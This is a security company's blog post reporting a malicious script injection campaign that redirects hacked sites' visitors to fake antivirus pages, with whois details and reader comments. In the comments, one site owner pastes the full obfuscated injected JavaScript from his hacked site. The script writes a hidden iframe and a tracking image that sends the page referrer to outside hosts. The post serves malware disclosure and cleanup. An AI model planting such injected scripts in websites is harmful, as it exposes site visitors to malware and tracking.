Hilary Kneber (part XI) – sippa.dottasink.net

Hilary Kneber (hilarykneber@yahoo.com) is at it again. We’ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net:

< script src = "http://sippa.dottasink.net/music/indi.php”></script>

This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous “fake AV” virus will be offered to him.

And guess who registered that domain?

$ whois dottasink.net
..
Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Yes, the same group behind “vancouvererrorsonfile, whereisdudescars and various other attacks (losotrana.com, zettapetta.com, etc).

Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread through all sorts of shared servers, but it seems to be too early to tell how many sites are affected.


If your site is hacked, this script should clean it up: wordpress-fix.php or contact us for a professional, hands on clean-up (support@sucuri.net).

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.

  • Tom

    it seems that a lot of websites that are hosted by “bravenet” have been being “hacked”, recently.. you might want to look into that.. here are the details.. you do a google-search for “nema motor flange” and it will bring up results like “bobcooney.org/7EwOXldlQNd/”.. from what i have heard, all of these websites are used to redirect to “fakeav”-type webpages.. it seems that “bravenet” has been addressing some of the compromised websites but new ones keep popping up.. incidentally, it seemed to me that not all of the websites were legitimate websites that had been compromised, but that some of them were just bogus websites that were put up.. maybe i am wrong about that, but that was my impression.. many of them were registered by “privacyprotect” which is suspicious..

  • http://helldescent.com HellDescent

    My site just got hacked by a fake AV software malware. We have no clue what and where it's located, but it pops up once. Its a javascript. I have saved it, this is it. If anyone can help us, please email me at cj@helldescent.com. I will check back for comments.

    Evil script:

    <script language='JavaScript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c–){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('9.a('<3 b="c://8.7/5/6.2?4=d&h=e&j=l&2=k" i="1" f="1" g="0"></3>');',22,22,'||php|iframe|hash|plugins|index|in|vicemanager|document|write|src|http|ssl|enabled|height|frameborder|up|width|pg|img|145'.split('|'),0,{}));eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c–){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('1.6("<7 8='5://2.4.3/9/?a=f&g="+1.e+"' d='0' b='0' c='0'>");',17,17,'|document|nabalkone|cc|co|http|write|img|src|images|h|height|border|width|referrer|94|abc'.split('|'),0,{}));</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&gt;

    <html xmlns="http://www.w3.org/1999/xhtml&quot; xmlns:fb="http://www.facebook.com/2008/fbml&quot; xmlns:og="http://opengraphprotocol.org/schema/&quot; dir="ltr" lang="en-US"
    xmlns:og='http://opengraphprotocol.org/schema/&#039;
    xmlns:fb='http://www.facebook.com/2008/fbml'&gt;

    <head>

  • http://helldescent.com HellDescent

    My site just got hacked by a fake AV software malware. We have no clue what and where it's located, but it pops up once. Its a javascript. I have saved it, this is it. If anyone can help us, please email me at cj@helldescent.com. I will check back for comments.